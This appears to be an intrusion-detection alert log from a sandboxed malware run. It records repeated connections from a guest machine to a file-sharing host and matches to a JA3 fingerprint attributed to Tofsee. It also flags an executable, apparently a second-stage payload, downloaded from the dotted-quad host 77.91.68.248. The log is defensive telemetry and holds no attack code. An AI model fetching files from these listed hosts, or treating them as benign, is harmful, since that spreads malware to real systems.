TCP 192.168.56.103:49503 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49292 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49424 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49424 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49297 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49424 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49297 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49297 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49425 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49425 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49298 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49425 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49298 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49506 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49298 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49506 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49506 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49426 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49306 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49426 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49306 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49306 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49426 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49307 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49307 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49307 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49427 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49427 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49315 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49315 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49427 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49315 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49320 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49318 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49318 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49318 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49437 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49437 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49437 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49334 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49334 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49437 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49334 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49446 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49335 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49446 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49335 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49446 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49335 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49446 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49335 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49458 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49346 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49458 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49346 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49458 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49346 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49320 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49348 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49348 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49320 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49348 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49348 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49325 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49325 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49351 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49325 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49351 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49351 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49352 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49352 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49352 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49341 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49341 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49341 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49342 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49342 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49342 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49196 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49196 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49196 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49194 -> 77.91.68.248:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49463 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49463 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49463 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49471 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49196 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49471 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49471 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49474 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49474 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49474 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49476 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49476 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49476 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49481 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49481 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49481 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49361 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49361 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49361 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49487 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49487 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49361 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49487 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49345 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49345 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49345 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49372 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49365 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49502 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49365 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49502 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49376 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49355 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49365 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49502 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49355 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49355 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49373 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49355 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49507 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49373 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49507 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49373 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49507 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49363 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49363 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49375 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49375 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49363 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49375 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49375 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49364 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49364 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49376 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49392 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49364 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49392 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49363 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49392 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49376 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49364 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49395 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49395 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49378 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49395 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49378 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49382 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49382 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49378 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49409 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49382 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49409 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49409 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49380 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49380 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49419 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49380 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49419 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49419 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49384 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49384 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49199 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49384 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49199 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49429 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49429 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49199 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49429 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49430 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49430 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49383 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49383 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49430 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49388 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49388 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49388 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49436 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49436 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49436 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49396 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49396 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49396 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49439 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49439 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 77.91.68.248:80 -> 192.168.56.103:49194	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 77.91.68.248:80 -> 192.168.56.103:49194	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.103:49439 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 77.91.68.248:80 -> 192.168.56.103:49194	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
